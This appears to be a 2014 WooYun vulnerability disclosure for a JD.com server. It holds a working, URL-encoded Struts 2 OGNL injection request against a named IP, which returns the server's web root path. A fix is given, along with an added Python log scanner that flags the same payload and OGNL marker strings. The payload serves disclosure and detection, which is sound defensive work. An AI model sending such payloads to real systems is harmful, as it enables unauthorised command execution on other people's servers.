
Command execution on a JD.com (Jingdong Mall) site (threatens the internal network)

2014-05-22 16:05

The problem is on 211.152.123.83, at http://211.152.123.83/login.jhtml. The following request evaluates an OGNL expression on the server and writes the web root path back into the response:

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}



Response body (the real path of the web root):

/export/data/tomcatRoot/jq1.360buy.com/

(screenshot: QQ截图20140407124632.jpg)

Proof of vulnerability:

The same request as above, which returned the web root path /export/data/tomcatRoot/jq1.360buy.com/ (screenshot: QQ截图20140407124632.jpg).

Fix:

Patch: update the Struts 2 (XWork) framework to a release that no longer evaluates OGNL in the redirect: action prefix.
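The request above injects an OGNL expression through the redirect: action prefix, which the Struts 2 / XWork version on this host (the com.opensymphony.xwork2 class names give it away) evaluated before the framework update the report asks for; the update is the only real fix. As an added example that is not part of the WooYun report, the Python below shows the compensating control a defender would run in the meantime: URL-decode the query strings from access logs and flag the prefix-plus-expression pattern, so the attempt shown above is reported while an ordinary redirect=/home parameter is not. The log lines, IP addresses and the analyse_query / scan_log helpers are all constructed for this example.

```python
"""
Detect Struts 2 OGNL injection attempts (the redirect:${...} pattern used in
the request above) in web-server access logs.  Added example, not part of the
original report.  All log lines below are constructed samples.
"""
import re
from urllib.parse import unquote

# Action prefixes that older Struts 2 / XWork versions treated specially and
# that the report's payload abuses ("redirect:").
RISKY_PREFIXES = ("redirect:", "redirectaction:", "action:")

# Tokens that appear in OGNL expression payloads.  Two or more together, or a
# risky prefix followed by an expression opener, is treated as an attempt.
OGNL_MARKERS = ("${", "%{", "#context", "#_memberaccess", "#req",
                "@java.", "getruntime")

# Combined-log-format line: client, ident, user, [time], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def decode_fully(s, max_rounds=3):
    """URL-decode until the text stops changing (bounded), so that an
    encoded payload and its plain form normalise to the same string."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def analyse_query(query):
    """Return (flagged, markers_found) for one raw query string."""
    q = decode_fully(query).lower()
    markers = [m for m in OGNL_MARKERS if m in q]
    prefixed = any(p in q for p in RISKY_PREFIXES) and ("${" in q or "%{" in q)
    return (prefixed or len(markers) >= 2), markers

def is_ognl_injection(query):
    return analyse_query(query)[0]

def scan_log(lines):
    """Parse access-log lines and return one record per flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line; skip, do not crash
        path, _, query = m.group("path").partition("?")
        flagged, markers = analyse_query(query)
        if flagged:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "path": path, "status": m.group("status"),
                         "markers": markers})
    return hits

# Constructed sample log: the report's request (IP replaced by a documentation
# address), a harmless redirect= parameter, and a plain POST without a query.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Apr/2014:12:46:32 +0800] "GET /login.jhtml?redirect%3A%24{'
    '%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest'
    '%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C'
    '%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.'
    'opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28'
    '%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter'
    '%28%29.close%28%29} HTTP/1.1" 200 41',
    '198.51.100.7 - - [07/Apr/2014:12:47:01 +0800] "GET /login.jhtml?redirect=%2Fhome.jhtml HTTP/1.1" 302 0',
    '198.51.100.9 - - [07/Apr/2014:12:47:15 +0800] "POST /login.jhtml HTTP/1.1" 200 1532',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['path']} status={hit['status']} "
              f"markers={','.join(hit['markers'])}")
```

The status code is worth keeping in the record: a 200 on a request like this, as in the report, means the expression was evaluated and the host should be treated as compromised, not merely probed. Signature matching of this kind is a stop-gap for triage and for confirming exposure in historical logs; only the framework update removes the evaluation path.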

Source: www.wooyun.org/bugs/wooyun-2014-055825
